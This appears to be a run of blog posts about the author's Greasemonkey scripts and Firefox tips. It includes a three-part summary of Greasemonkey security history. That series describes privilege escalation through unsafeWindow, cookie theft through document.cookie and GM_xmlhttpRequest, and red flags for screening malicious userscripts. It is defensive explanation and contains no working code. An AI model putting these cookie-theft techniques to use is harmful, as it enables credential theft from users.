Skip to content

Adding the Titles of Videos to Embedded YouTube Videos

During and after the times that I have written each of my Greasemonkey scripts, I look for ways to improve on these scripts. I often have ideas in mind for adding features to them and for making them more efficient. And when I consider it a high enough priority to implement these improvements, these scripts get updated.

And recently, an event occurred that made it a priority for me to make one of these updates to one of my scripts. I actually considered adding the titles of the YouTube videos embedded into web pages to the links that are added below these videos when this script is used. In addition to being able to visit the page on YouTube on which the embedded video can be found, one may want to know the title of the embedded video before playing it. And after a user requested that I add this feature to this script, updating this script became my new highest priority.

This idea was one that I originally had when I found out about this script that adds titles of videos to the links to YouTube videos. I thought that it was a very good idea to make this script available, and it had been downloaded and installed many times. This script could be used with the script that I wrote to display the titles of embedded videos. However, I have found that this script does not always add the titles to the links that my script adds. Also, I would prefer to have the functionality for adding these titles in my script in order to save users the trouble of having to look for another script.

A drawback of adding this functionality to the script is that it is addition of a feature that some might not want. Some may not want the overhead of having these HTTP requests done to retrieve video titles, and some may simply find this feature unnecessary. And many may already have the script for adding titles of videos to these links that I previously mentioned, and so this script may sometimes add the video title a second time. For these reasons, I added a feature for toggling whether or not video titles are to be displayed. And below is a link to a screen shot that shows a web page on which the script is running, with the option to not display videos titles visible.

I wanted this updated version of the script to be made available as soon as possible. Therefore, I looked up the answers to questions I had in code that already existed. Some of the code in my script is quite obviously based on what already exists in the script for adding the titles of YouTube videos to the links to these videos. I also referred to this page on the GreaseSpot Wiki in adding the option for toggling whether or not to include video titles in these links. I often prefer to find solutions to problems on my own, although this time, trying to solve the problem without referring to code that already exists would likely be considered reinventing the wheel. However, it was also requested that I add these links to embedded videos blocked by the NoScript Firefox extension, as my script did not previously add links to videos blocked by NoScript. And I did not look up any answers in ensuring that it would add links to videos blocked by this extension.

I would like to know about any issues that this new version of the script has. It worked well in the tests that I ran with it, although the possibility that there might be instances in which it does not work properly does exist. I am also always interested in hearing suggestions on how this script can be improved. For example, the page must be refreshed for the changes to the setting for toggling whether or not to include the video title to take effect. Some might prefer that the page automatically be refreshed after this setting is changed, and some may have other suggestions for improvements to the script. It was a suggestion that led to this improvement, and so if you have any ideas on what can be done to improve on it further, I would like to know about these ideas. Scripts such as these are for users like you, and it is your suggestions that make me more likely continue improving on them.

Installing Firefox’s DOM Inspector After Not Installing It Initially

After receiving my computer back after having it serviced, I needed to download and install the applications that I use. I was initially quite pleased to see that the first application I would have installed, which is the Mozilla Firefox web browser, was already installed. However, I was not pleased to see that the DOM Inspector was not installed with it. And according to the article on the MozillaZine Knowledge Base on the DOM Inspector, when using the operating system that I use, it can only be installed when Firefox is first installed. And unfortunately, I only discovered that this extension was missing after installing many other Firefox extensions and after bookmarking many pages. Therefore, uninstalling then reinstalling Firefox was not something I wanted to have to do. There had to be a way around this. There had to be a way for me to install this extension on which I often rely, and without having to reinstall Firefox. So I decided to search the web for this method of installing the DOM Inspector after Firefox was installed, as I knew that this method had to exist.

At the time that I was looking for this method of installing the DOM Inspector, I wanted to have it installed as soon as possible. I needed it at the time, and I did not want to have to wait much longer to have what I needed. I already had to wait long enough after having to wait for my computer to be serviced. So I followed this first set of instructions I found on how to install the DOM Inspector this way. After following those instructions, I was once again able to use the DOM Inspector. Still, I had to wonder if there was a better method of installing it with Firefox already installed. Starting the installation of Firefox again, then copying files from a location where files were temporarily stored, then canceling the installation seemed more complicated than necessary. And later on, I did find a better way to install it, which coincidentally, was mentioned in the comments section of the blog post that contains these instructions that I followed.

It was when I upgraded to version 2.0.0.13 of Firefox that I needed to discover how to install the DOM Inspector this way once again. Every other Firefox extension I had was considered compatible with this newer version of Firefox except for the DOM Inspector. And I found that the reason it was considered incompatible with this new version of Firefox was because of one line of information in its install.rdf file. This line of information indicated that the last Firefox version with which this extension was compatible was version 2.0.0.12. So then I needed to once again find out how to reinstall the DOM Inspector, as I did not recall all details about how to install it while Firefox was already installed. And that was when I came across this set of instructions for installing the DOM Inspector. I found this set of instructions more straightforward and less unwieldy than the instructions I previously followed. It seemed more straightforward to use 7-Zip to open the Firefox setup file, copy the DOM Inspector’s contents to another folder, create an archive (with a file extension of .XPI) of those contents, and install the extension using that archive. This is something I never thought of doing, likely because I was too busy doing other work. However, I also decided to do something else to avoid having to install this extension again for as long as I use Firefox 2.

I did not want to go through this process after each update to Firefox. And I thought that there had to be a better way of keeping the DOM Inspector installed after installing it this way. I did not think I should have to keep going through this process simply because of a decision made at the time that Firefox was installed. Those who chose to have this extension installed at first do not need to do this, so why should I need to do this? And to accomplish this task of creating the illusion of the DOM Inspector being installed when Firefox was installed, I added the step of modifying the maxVersion property of the DOM Inspector’s install.rdf file so that it would work with subsequent versions of Firefox. I tested out this solution by uninstalling the DOM Inspector, then by reinstalling it using the instructions previously mentioned, although with a setup file for an older version of Firefox. And I found that after making the correct modifications to the install.rdf file before creating the archive, it could be installed, and would work with the newer version.

A guide to the entire process of installing the DOM Inspector with Firefox already installed is one that many might find useful. Therefore, a step-by-step how-to guide for doing this should be easily accessible. So I decided to include step-by-step instructions to follow for installing the DOM Inspector this way. I aspire to make this the kind of guide that I would have liked to have had when I decided that I needed the DOM Inspector without having to reinstall Firefox. And so below, I outline the process of installing the DOM Inspector after Firefox is installed, without having to go through certain installation or reinstallation processes again.

  1. Download the Firefox setup file. All you need to do is visit www.getfirefox.com and then click the link to download this setup file.
  2. Go to the directory to which this setup file was downloaded.
  3. Then use file archiving software to view the contents of the setup file. 7-Zip, which can be downloaded from here, is software I would suggest for completing this task.
  4. By using this file archiving software, go to the directory titled optional, and then go to the directory titled extensions. You will then see a directory titled inspector@mozilla.org, which you can copy to a location of your choice.
  5. Then go to the location to which you copied this directory, and then open this inspector@mozilla.org directory.
  6. This step is optional, and can be skipped if you only need a relatively short-term solution to the problem of not having the DOM Inspector installed. Open the install.rdf file, then look for where <em:maxVersion> is listed. The version number of Firefox that was downloaded will be listed there, and you may change it so it will work with future versions of Firefox. I personally have changed this version number to 2.*.*.* so that I may not need to reinstall the DOM Inspector again for as long as I use Firefox 2. The reason I chose to enter this as the version number will be made more clear later in this entry.
  7. Use file archiving software such as 7-Zip to add the contents within the inspector@mozilla.org directory to a ZIP archive, although you will need to ensure that the archive has .XPI as its extension.
  8. Go back into Firefox. Then open this newly-created archive by entering the path to the archive in the address bar, or through another method of your choice. You will then be able to install the extension as you normally would. Therefore, you will then need to restart Firefox, and then you should be able to use the extension.

It may not be long until this set of instructions will be considered obsolete. Firefox 3 will soon be released, and the DOM Inspector will not be included with it. Instead, when one wants to use the DOM Inspector with it, one can simply download and install it, as it is already available here. In fact, although Firefox 3 Beta 5 is said to be for testing purposes only, quite a few people are already using it regularly. This is likely because it can be used without having to lose many extensions or configuration settings, according to this Lifehacker article. And many are also using Firefox 3 Beta 5 simply because it is already considered quite an improvement over Firefox 2. However, if you prefer to use Firefox 2 for now, and need to have the DOM Inspector installed after initially choosing not to install it, there is a way to install it. And if you can think of a solution to this problem that is better than the one I suggest here, then I encourage you to share it.

Facilitating the Analysis of Data Sent Via Web Forms

After writing three consecutive entries here about Greasemonkey’s past and present security issues, I wanted to write about a different topic. I was actually fine with making Greasemonkey the topic once again, although this time, I preferred to emphasize the reasons to use it, rather than the reasons one may want to avoid it. I also wanted to write about topics other than Greasemonkey, as the percentage of posts about Greasemonkey on this blog is currently greater than I would like it to be. I aspire to make this blog about a somewhat more diverse group of topics, and so I decided to make this entry about webbots and automated form submission. And so it was time for a break from posts about Greasemonkey. Or so I thought.

I have recently been reading a book titled “Webbots, Spiders, and Screen Scrapers: A Guide to Developing Internet Agents with PHP/CURL” by Michael Schrenk. And as I read through it, I came up with a few ideas for PHP/CURL projects. And even though none of the ideas for projects that I currently have involve automated form submission, I find the topic of automated form submission interesting. So I read through the chapter on this topic, and I found the examples of how to use the code available through the book’s website quite interesting. However, what I found more interesting and more important were explanations of what needs to be considered when writing code that automates form submission.

It is said in that chapter of the book that it is important to ensure that information sent by software that sends form data is what would be expected by a server receiving the data. One can look through the page source to discover what data is sent via a form. However, this way of determining what data is sent is inefficient, as it is time-consuming and may not lead to discovery of all data that gets sent to the web server through the form. Fortunately, on the website for this book is a page that, when form data is sent to it through HTTP GET or POST methods, displays that data sent through the form. And this page that displays variable names and values sent to it, among other useful data, gives developers a very efficient way of getting this data.

Although the data displayed on this page is useful for developers of form submission webbots, the suggested method of using the page is certainly not convenient. To use it, the action attributes of the <form> tags of forms to be analyzed need to be replaced with the URL of the web page to which the form data is to be sent for analysis. And so it is suggested by Schrenk that a copy of the web page on which one is working be saved to the local hard drive, and then source code of the page be modified to change these attributes accordingly. After that is done, one will need to open the saved and modified page in a web browser. And it is only after all of these steps are completed that one can enter data to be sent in a form to this web page that displays the data sent through the form.

There must be a better way, a more efficient way, an automated way, of updating attributes in the page than the process previously outlined. And does automation of changing attributes ever sound like a job for a Greasemonkey script?

As anyone with knowledge of what Greasemonkey can do knows, one can, with a Greasemonkey script that consists of only a few lines of JavaScript code, change the attributes of each form in a page automatically. And so I decided to take the few minutes it would take to write a Greasemonkey script that can make these changes. I had it set to work with all web pages, and so I have it disabled most times, as I usually intend to have form data go to its intended destination. One could also simply reconfigure the script so that it only works with certain pages, as one would likely only be interested in the form data sent from a few different pages. This is a script that is unique, as it is one that almost certainly requires some configuration on the part of the user. It is also unique in that it is one that may be disabled most times. However, this script performs its intended task where and when it needs to be performed.

If you have Greasemonkey installed, then you can install this script if you click here. One might measure the success and usefulness of a Greasemonkey script by referring to the number of times it is installed from a site such as Userscripts.org. And if one measures success and usefulness of scripts this way, then this script may not be considered very successful or useful at all. However, it is there for those who would like to use it, and there are some who might be interested in using it. After focusing on malicious scripts, I thought it would be appropriate to focus on a script that is beneficial and cannot be malicious. Still, it may not be the most useful script. And because I want to emphasize Greasemonkey’s benefits and usefulness in this post, I’ll end it with an amusing and entertaining video that explains how Greasemonkey can be useful.

Greasemonkey and Security: Attempting to Summarize What You Need to Know (Part 3 of 3)

In the first entry in this series of entries on Greasemonkey and security, the security issues that Greasemonkey has had in the past were covered. Then in the second part of this series, the most recent security issues that were inherent to Greasemonkey were covered. And in this third and final part of this series, issues with the scripts that Greasemonkey uses, which are issues that Greasemonkey has had and may always have, are the topic.

As you probably know if you are reading this, Greasemonkey is a powerful tool that allows the users of it to do everything that can be done with JavaScript to web pages. It also has abilities that are beyond those that JavaScript usually has. And as was said before, the features that Greasemonkey has that allow its scripts to do what cannot usually be done with JavaScript can lead to issues with security. Many Greasemonkey scripts pose no security risk. Ones that simply make slight adjustments to pages, such removal of page elements, are harmless. However, there are also many more useful and powerful scripts that showcase Greasemonkey’s abilities through use of Greasemonkey’s advanced features. And these advanced features that make Greasemonkey as powerful as it is also give the scripts it uses the ability to perform malicious activity.

The source code of scripts used by Greasemonkey can be seen by all those who would want to view the source code of these scripts. Therefore, anyone who intends to do anything malicious with these scripts would certainly not be able to easily hide the fact that their scripts are malicious. There are a few things one could look for in the source code of scripts to determine whether or not they may be malicious. For example, when viewing this source code, one could get an idea of what data the script sends via the GM_xmlhttpRequest function, and could also see if the document.cookie property is being used. However, both the GM_xmlhttpRequest function and the document.cookie property have non-malicious uses. And determining whether a script is malicious or not is something that is not always easy to do. The number of Greasemonkey users who know what to look for in these scripts may not be known, although it does seem that there are many who would install scripts without knowing everything that their scripts do.

For some time on Userscripts.org, on each page in which information about a particular script is displayed, there had been a banner warning users about the possibility of scripts “stealing” cookies. In that warning was also a link to a thread of discussion which had been ongoing for several months. In that thread, users of Userscripts.org discussed implications of these security issues. The red flags that should be set off when one views the source code of these scripts was one topic that was brought up in that thread. Possible solutions to these issues were also mentioned in that thread. That thread has also been a place where requests have been made to review or remove scripts that may be malicious. It is a long thread in which many ideas and concepts are mentioned. And as I had done in the two previous entries on this topic, I attempt to summarize what is most important to know about this issue with Greasemonkey security.

The issue of what to look for in these scripts is one that needs to be mentioned. But first, I will mention a security issue that is often associated with JavaScript. Much has been said about the possibility of cross-site scripting (XSS) attacks when JavaScript is used. And in one kind of XSS attack, cookies can be stolen through use of the document.cookie property. This is a serious issue, as the data in cookies, which may include data such as a user’s authentication credentials, could be sent to another domain. An example of how this cookie stealing XSS attack could be carried out can be found here. In a cookie stealing attack similar to this kind of XSS attack, Greasemonkey scripts can be used to try to acquire the data stored in cookies. When viewing a script’s source code, one could try to see if information accessed through cookies in the scripts is sent to another website as a parameter in the URL of that website. There might also be the possibility that data in cookies could be transmitted to any site on the web via the GM_xmlhttpRequest function. However, code in scripts like these could possibly be noticed fairly easily. Still, a number of cookies may have been successfully stolen via scripts downloaded from Userscripts.org and other sites on which Greasemonkey scripts are hosted.

When an issue such as this occurs, solutions to it need to be suggested so that the necessary implementation of these solutions can occur. One set of possible solutions involve what can be done by script-hosting sites such as Userscripts.org. At this time on Userscripts.org, scripts already have sections for comments about each script. Also on Userscripts.org is that thread of discussion in which issues with scripts can be discussed. However, providing information on scripts this way may not solve the issue of keeping more casual users of Greasemonkey from installing malicious scripts before it is too late. Not all Greasemonkey users know what to look for, and it is only those who have the time and ability to look through scripts to check for malicious code who could report scripts that contain malicious code. It may be true that given enough eyeballs, security issues with Greasemonkey scripts could be shallow. But how can it be known if there were enough eyeballs on the code of a script to determine if the script poses a security risk?

There may be those who would say that the best way to solve this issue with Greasemonkey scripts could be with the use of other Greasemonkey scripts. And I actually considered writing a script that could tell automatically if there was anything in the source of a Greasemonkey script that could lead to problems. However, one user already wrote a similar script, and that script, titled “Screen Userscripts” can be found here. It should be mentioned that this script may not screen every malicious script. For example, there have apparently been scripts that use code obfuscation techniques to hide the fact they are accessing document.cookie, and obfuscated code is not something that this script detects. Use of code obfuscation techniques could be considered a red flag in a script’s source code. And this script could be updated to look for this red flag, and many other red flags could be found by a script similar to the “Screen Userscripts” script. Even use of TinyURL.com in a script’s source code could be considered characteristic of a script that cannot be trusted. Not all malicious scripts might successfully be determined to be malicious by script-screening scripts, as there may be those who will always try to get the code in their scripts around any filters. However, a sufficiently large community of users looking into this issue would minimize the number of scripts that could perform anything malicious.

It has also been suggested that updates be made to Greasemonkey itself. Some have suggested that Greasemonkey should disallow scripts from being able to access document.cookie in much the same way that the GM_xmlhttpRequest function only allows use of the HTTP, HTTPS, and FTP protocols. However, that would cause a number of non-malicious scripts to not work properly. This tradeoff between security and functionality is one that Greasemonkey has had and may always have. And as long as Greasemonkey has the ability to do everything that JavaScript can do and more, it could be considered a security risk. What appears to be Greasemonkey’s greatest selling point is also its most serious security issue.

In this series of entries, I have tried to summarize what should be known by users of Greasemonkey. However, I may not have covered everything that could have been (and perhaps should have been) covered. Some might say I have left out some important information, despite the fact that the information that I have written spans three rather long blog posts. In addition, there might be other issues with Greasemonkey security that are not yet known, as was the case with the recent security issues found by Anthony Lieuallen that were mentioned in the second part of this series. This is certainly not the last word on Greasemonkey and security. More information will be posted on this topic in the future. In fact, I have considered writing a summary of this summary that has taken up three blog posts. Greasemonkey has been referred to as a Firefox extension to avoid, as you can see if you read this article. However, as was said in that article, it is one to avoid only if you are not willing to do your homework. And anything that could make it easier for users to do that homework should be made available. Greasemonkey is meant for those who are knowledgeable about topics such as JavaScript and security. Therefore, I encourage those who want to use it to be sure to be knowledgeable about these topics. And if you know the risks and rewards that come with using Greasemonkey, you should be able to enjoy the rewards that come with using it, without having to take unnecessary risks.

Greasemonkey and Security: Attempting to Summarize What You Need to Know (Part 2 of 3)

In the previous entry in this series of entries on Greasemonkey and security, an overview of the history of Greasemonkey security was given. An explanation of why that history matters now was also given. And in this entry, the most recent security issues that Greasemonkey has had are the topic. As was mentioned in the last entry, security fixes had been made in the latest release of Greasemonkey that caused some Greasemonkey scripts to not work. The scripts that do not work with this version, version 0.7.20080121.0, are some of those that work with Greasemonkey’s API functions and the unsafeWindow variable. As was said last week, scripts that use functions defined on the remote page (which are accessed through the unsafeWindow variable) could be vulnerable to hostile pages. However, it recently became apparent that use of this variable makes scripts even more vulnerable than previously thought. This new version of Greasemonkey attempts to make scripts that use this variable somewhat less vulnerable to hostile remote page code. And in this entry, this new version of Greasemonkey and the issues it addresses are the topic.

In the last entry here, it was noted that any script that uses functions or properties of the unsafeWindow or unsafeDocument variables should not be trusted, as the remote page can redefine what is accessed through these variables. However, the possibility of the remote page content running code to redefine what is being accessed through unsafeWindow appears to be only one issue that can result when using unsafeWindow. In that last entry, the importance of Greasemonkey keeping remote pages from being able to use its API functions was also emphasized. So one might think that use of both unsafeWindow and these API functions in a script might possibly lead to some very serious security issues. And it has recently been found that this is the case. One individual seemed to want to find out exactly how unsafe it actually was to use unsafeWindow. And that individual determined that some scripts that use unsafeWindow and Greasemonkey’s API functions could possibly give the remote page access to Greasemonkey’s API functions.

It was said that this particular security issue was publicly disclosed. However, I had some difficulty finding information about it through the use of Google searches. I later discovered that I apparently needed to use a different Google service to find information about this security issue. It was after I looked through posts on the greasemonkey-dev group on Google Groups that I came across the information that I was trying to find. It was said here in this discussion on greasemonkey-dev that when unsafeWindow is used, a privilege escalation attack by the remote page can be made so that the remote page code could be able to access Greasemonkey’s API functions. The news about the possibility of the kind of privilege escalation attack previously described was apparently broken there in that group. And it is there in that thread of discussion where one can see that it was the individual who tried to demonstrate why use of the unsafeWindow variable was unsafe who discovered this security flaw.

Proof of concept code can definitely help in supporting claims made about security flaws. And the individual who discovered this security flaw did write code to support that claim. And the support of that claim was made in the form of the JavaScript on this page and a Greasemonkey script one can use with that page. The Greasemonkey script uses the GM_setValue Greasemonkey API function to set a value to be stored by the browser, then it calls a function on that page through use of the unsafeWindow variable. And when viewing the source code of the page, one can see how the page tries to gain access to what called the function, in an attempt to gain access to the GM_setValue function. When using the script with the page, one will see the value stored in Firefox’s settings before and after the function call to the remote page is made. When using the script in the page with earlier versions of Greasemonkey, the value stored that appears in a window that pops up is different from what it was before the function call. This indicates that the remote page successfully gained access to the GM_setValue function and used it. However, when using this new version of Greasemonkey, one will see that the page’s attempt to change a value stored in Firefox’s settings will be unsuccessful. Therefore, this new version addresses this privilege escalation issue, and so the importance of upgrading to this newer version becomes apparent when using the script with these different versions of Greasemonkey. It should also be noted that this issue did not occur when it was tested with the previous version of Greasemonkey on Firefox 3 Beta 2. Therefore, use of this version of Firefox is considered a way of getting around this issue.

The privilege escalation attack demonstrated on the previously mentioned web page was only one example of what could have possibly been done by the remote page when certain scripts were used. The importance of Greasemonkey preventing the remote page code from accessing the GM_xmlhttpRequest function has been mentioned in the previous entry here. And cross-domain requests were a possibility, as the remote page code could obtain references to other API functions in an attack similar to the one carried out by the the proof of concept code. In addition, in the greasemonkey-dev group, it was said that the remote code could have accessed other information, including the source code of the script. Considering that sensitive data is sometimes stored in the source code of scripts and in the settings stored in the browser that should only be accessible to certain Greasemonkey scripts, this was a serious issue. And it was an issue similar to Greasemonkey’s previous security issues that were outlined here previously. In addition, in an exploit similar to one that was described in the first part of this series of entries here, the GM_xmlhttpRequest function could have been used to send this leaked sensitive data to any location on the web. Although scripts could no longer access files stored on a user’s hard drive, this was an issue that needed to be addressed. Source code leakage and API leakage issues were found to be a possibility again, as they were in Greasemonkey 0.3. These issues may have been on a smaller scale as much fewer scripts had been affected by these more recent security issues, although this was still a problem that needed to be solved.

The fix for this issue came out about a week after the issue was first reported on greasemonkey-dev. The announcement of the new version of Greasemonkey was made here on Greasespot by Greasemonkey creator Aaron Boodman. And in this entry on Greasespot that announced this new version, Boodman mentioned the security issues the new version addresses, and that these security fixes result in some scripts not working with this new version. A link to an article on the Greasespot wiki on the compatibility of scripts with the new version was also there in that entry. It is quite important that script authors who have written scripts that use both these API functions and the unsafeWindow variable refer to that page on the Greasespot wiki, as it mentions a workaround to fix scripts that may be broken. Some might have considered themselves inconvenienced by not having their scripts work with the new version of Greasemonkey. However, when using scripts that use the unsafeWindow or unsafeDocument variables, one takes the risk of having these scripts not do their intended function. And it may be better for them to not work at all than it is to run the risk of having the remote page code perform malicious activity.

Having said this, the most serious security issues that Greasemonkey has may not be considered inherent to Greasemonkey itself. It is certain scripts that Greasemonkey can use that can be considered the most serious security-related issues when Greasemonkey is used. Greasemonkey makes some attempts at preventing scripts from being security issues. However, there are scripts that need to use variables that have names beginning with “unsafe” and that is a problem for which no easy solutions exist. The new version of Greasemonkey simply tried to make unsafeWindow as unsafe as it was previously thought to be. And then there is the issue of deliberately malicious scripts, such as those those that steal cookies. Whether or not Greasemonkey can or should prevent this kind of malicious activity on the part of scripts is debatable. For now, it is still important that scripts be checked to see if they could intentionally or unintentionally perform anything undesired. As I have said before, I had been meaning to write about the scripts themselves, the cookie stealing ones in particular, for some time. And in the next and final entry in this series of entries on Greasemonkey and security, the topic will be the scripts themselves.

Greasemonkey and Security: Attempting to Summarize What You Need to Know (Part 1 of 3)

As one might expect when I am unable to access the web as often, the inspiration for what I write about in this entry comes from something that I have read that was not in an electronic form. As I have mentioned previously on this blog, I have taken time to rediscover why I have purchased information that is in the form of ink on processed tree carcasses. And one such book that I had been reading is one that no one who reads this blog should be surprised I own. It is one that likely occupies the bookshelves of many Greasemonkey coders. This book, titled “Greasemonkey Hacks” that was written by Mark Pilgrim and published by O’Reilly Media, contains much information on what can be done with Greasemonkey, the source code to Greasemonkey scripts, and explanations of the source code. It is a book that anyone serious about writing Greasemonkey scripts should at least consider reading.

As one might imagine, much of the information in the book is only useful when one has access to a computer, so that one can work with the example scripts that are there in the book. This book seems to have been designed specifically to be one that would be on a computer desk, likely left open to the last section that a coder using it found interesting. However, there is some information in this book that can be read without finding there to be any need for access to a computer at the time that information is being read. And one of these “hacks” in the book that can be read with no need to have a computer nearby is one that I would say stands out as one of the most important ones in the book. In fact, one may go as far as to say that this hack is one that should be read by anyone serious about writing Greasemonkey scripts that make use of what Greasemonkey has to offer. And it is likely for this reason that this hack titled “Avoid Common Pitfalls” is freely available online as an article on the O’Reilly Network. And that article on O’ReillyNet is actually titled “Avoid Common Pitfalls in Greasemonkey: How the History of Greasemonkey Security Affects You Now.” And here I write about why the latter part of that title is still appropriate.

I had been meaning to write about the security issues that Greasemonkey has and has previously had for some time. In particular, I considered it important to focus on the issue of “cookie stealing” scripts that are discussed here. However, it was only after I read that previously mentioned section of that previously mentioned book that I decided that it would be best to make the topic of Greasemonkey and security the next topic of discussion on this blog. I was going to simply write about what was written by Mark Pilgrim then, and why it is relevant even two and a half years after it was published. And in one of those coincidences that sometimes occur as I prepare to write an entry to this blog, a new version of Greasemonkey was released that addresses publicly disclosed security issues that have similarities to issues mentioned in Pilgrim’s article.

As you may know if you have read Pilgrim’s article, there was a time that Greasemonkey had some very serious security-related issues. In the article, issues that it had that did not seem to be considered when Greasemonkey was first written are mentioned. The issue of “trusting the remote page” on which the scripts are run is primarily noted in it. Remote pages could have been designed to take advantage of issues that can occur when Greasemonkey scripts are run. It was in this article that it was described how in Greasemonkey 0.3, a combination of security flaws could have led to remote pages reading files stored on a user’s hard drive, then the forwarding of the contents of those files to any location on the web. In addition, it was said that the possibility of the remote page redefining the DOM functions used by scripts to work with web pages did not seem to be considered when earlier versions of Greasemonkey were first released. Therefore, another possibility of the remote page running code to interfere with Greasemonkey scripts existed then, and this was an even more serious issue considering that the code in Greasemonkey scripts could have been captured by the remote page. With information on the scripts that were being run, it could have been determined which DOM functions were being used by the script that could be redefined to run code to interfere with the script.

Then in the article, after these security issues are mentioned, the way in which Greasemonkey was updated in version 0.5 to address these issues is noted. No longer did <script> tags get injected into the page in this version to lead to DOMNodeInserted events. Therefore, the remote page could no longer use these events to tell if a Greasemonkey script was injected into the page. And Greasemonkey’s API functions (such as GM_xmlhttpRequest) that allow functionality beyond what JavaScript allows were no longer defined as children of the global window object to make these API functions accessible to remote pages. And by addressing this issue, remote pages could no longer capture a reference to the GM_xmlhttpRequest function to send any data it could gather to any location on the web. Therefore, the issue of circumvention of the same-origin policy that JavaScript has as a security feature was addressed. In addition, the window and document objects were redefined as XPCNativeWrappers, so Greasemonkey would not work directly with objects that could have their methods redefined by the remote page. Instead, when a function call needed to be made, it could be made knowing that the function could not have been modified by the remote page in an attempt to run arbitrary code. Functions would not run arbitrary code, and objects returned by the function calls were also XPCNativeWrappers, and thus, could not have their functions or properties redefined by the remote page.

In addition, it is said in Pilgrim’s article that there are no easy ways around some issues. One of these issues for which no suitable workarounds exist involves the use of the window and document objects. The unsafeWindow and unsafeDocument variables, which are respectively references to the actual window and document objects, are mentioned. It seems the reason these two variables exist in Greasemonkey is because some JavaScript functions on remote pages may need references to the window or document objects as parameters, and these functions would not accept XPCNativeWrapper objects as parameters. Any Greasemonkey script that tries to use functions or properties of the unsafeWindow or unsafeDocument objects should not be considered secure, as remote pages could redefine these functions and properties. And it is for this reason that it is said in the article that use of the watch function, which requires use of the unsafeWindow variable, is considered unsafe in Greasemonkey scripts, as remote page code could redefine this function.

The article by Pilgrim also mentions how past security fixes can lead to common pitfalls when writing Greasemonkey scripts, as JavaScript code that would usually be expected to run properly may not work in the context of a Greasemonkey script. By having Greasemonkey scripts run in what is known as a sandbox, and by working with XPCNativeWrapper objects, some common ways of writing JavaScript code will not work in a Greasemonkey script. There may be more than one way to code a solution to a problem in JavaScript, and it is important to know that there are fewer ways of approaching these problems when writing the JavaScript in Greasemonkey scripts. And so it is important to know the limitations on how the JavaScript in a Greasemonkey script can be written. So when JavaScript that is implemented properly according to reference guides on JavaScript does not work in a Greasemonkey script, the answer to why it does not work may be found in Pilgrim’s article. However, this article may not actually be the best reference guide for times when JavaScript that seems to be properly written does not work in a Greasemonkey script.

One might think that an article written years ago may be outdated. And in some ways, Pilgrim’s article does not seem to be as accurate as it may previously have been. In fact, I recently came across a set of notes by Brian Donovan titled “Greasemonkey Pitfalls 2007” in which it is said that some of the pitfalls mentioned in Pilgrim’s article are not actually valid pitfalls. In Donovan’s notes, there are links to pages with information on each pitfall, and these pages have links to Greasemonkey scripts that are designed to work with those pages. Each of those scripts contain JavaScript code that was said in Pilgrim’s article to not work in the context of a Greasemonkey script. However, after running these scripts on the pages of Donovan’s site, one will see that it appears to be true that some of these pitfalls do not appear to be valid. Other pitfalls, however, do appear to be valid, and it is important for Greasemonkey coders to keep this fact in mind. Pilgrim’s article might not be as accurate as it previously was. Still, it can be considered a good starting point for Greasemonkey coders as they look for information on which ways of writing the JavaScript in Greasemonkey scripts will not work. And it also serves as a guide that describes to Greasemonkey coders why these restrictions on how the JavaScript can be written in these scripts exist.

Indeed, this article was published quite a while ago, and thus there was much time for many to read it. Therefore, many of those reading this post may have already read this article that I am summarizing. However, if giving this summary of this article leads to greater knowledge among Greasemonkey coders of what was written there, and if it leads to more of them reading the article, it will have been worth it for me to write this summary of the article. I think it is quite important that as many Greasemonkey coders as possible read what Pilgrim wrote, and I do not consider the material he wrote as confusing as Pilgrim says it is. It can be good to know about the security issues that Greasemonkey has had before, although what may be considered the main reason it is important is its listing of common pitfalls that result from solutions to Greasemonkey’s past security issues. Still, security issues from the past should be considered relevant, and one reason these past issues matter ties in with the more recent security issues Greasemonkey has had.

These most recent security issues that Greasemonkey has had reminded me of what was said in Pilgrim’s article. These issues involve the unsafeWindow and unsafeDocument objects and Greasemonkey’s API functions, all of which are mentioned in the article. In this software update, a number of scripts that use these objects and these API functions are affected, and will not work with the new version. Previously, to address the much more serious security-related issues Greasemonkey had in version 0.3, many more scripts did not work with it until later versions of it were released. Greasemonkey’s most recent security issues may be considered much less serious than the security-related issues it had before, but these issues should be mentioned. The way in which Greasemonkey scripts are to be written is affected once again. And although the way they must be written is affected to a much lesser extent than before, there are now more of these pitfalls of which Greasemonkey coders must be aware.

This newest version of Greasemonkey, version 0.7.20080121.0, is being mentioned here on this blog weeks after it was actually released. One might think I should have made it a priority to write about this new version sooner. However, I consider this entry that is mostly a summary of an important article the most important entry that I have written to this blog so far. Therefore, I wanted this summary to be as well-written as possible, and so I took much time to try to ensure that it was well-written. In fact, Pilgrim’s article can be considered something of a summary, as it does not list all security fixes that were made to Greasemonkey. For example, scripts are no longer allowed to access URLs starting with “file://” to prevent scripts from accessing local files, and that is not mentioned in Pilgrim’s article. This entry may be considered a summary of a summary, and Pilgrim’s article may only be considered a starting point when reading about security issues. I would also suggest referring to information on security on the GreaseSpot wiki when one has questions about Greasemonkey security. And the security issues addressed by the newest version of Greasemonkey will be covered in the next in this series of entries on Greasemonkey and security. And it will hopefully be published before it becomes too outdated for me to write about this new version.

An Update to a Script That I May Not Be Trusted to Update

It was not long ago that I discovered that a number of Greasemonkey scripts that are designed to work with Gmail needed to be updated to work properly again after a few changes were made to Gmail’s code. And it was once I was once again able to access a web browser with Greasemonkey installed on it that I checked to see if the script that I wrote for redirecting to the older version of Gmail upon logging into Gmail was affected. And after running a few tests with it, I saw that the script performed the redirect successfully when accessing Gmail through a secure connection, but not when accessing it when it was “http://” rather than “https://” entered as the first part of the URL. This error was not reported on the page for the script on Userscripts.org. That may have been because secure connections to Gmail are used more often by the users of this script. In any case, I took the time to modify the script, test it out, and ensure that it would redirect the user regardless of whether what was entered in the URL indicated a secure or non-secure connection were to be used.

After I removed only one ASCII character from the script’s source code, it worked as intended once again. Although I only needed to remove one byte of data from the script’s code, I did consider it an accomplishment for me to correct that error at the time it was corrected. And the main reason I am surprised that I was able to get this done without the error being reported on the script’s web page is not because I am still unable to work with my own personal computer. The main reason I am surprised that I was able to get this done is the main point of this post. (I am not dedicating an entire blog post to the removal of eight bits of data from a script.) And this main point I am making involves some more important information that I need to give about this script.

Although this script is one that has been downloaded and installed more often than any other Greasemonkey script I have written so far, as you can see here, it is actually not one that I myself often use. When I wrote this script, it was not written so much for myself as much as it was for those who preferred the older version of Gmail to the newer one. From the time that I first wrote the script, it always was one that was designed as a quick fix to solve what many others viewed as a problem. I personally do not mind the newer version of Gmail, and thus I would not be expected to use this script that I wrote very often. Therefore, if it needs to be updated, it is not likely that I would be one of the first to know about the need to update the script.

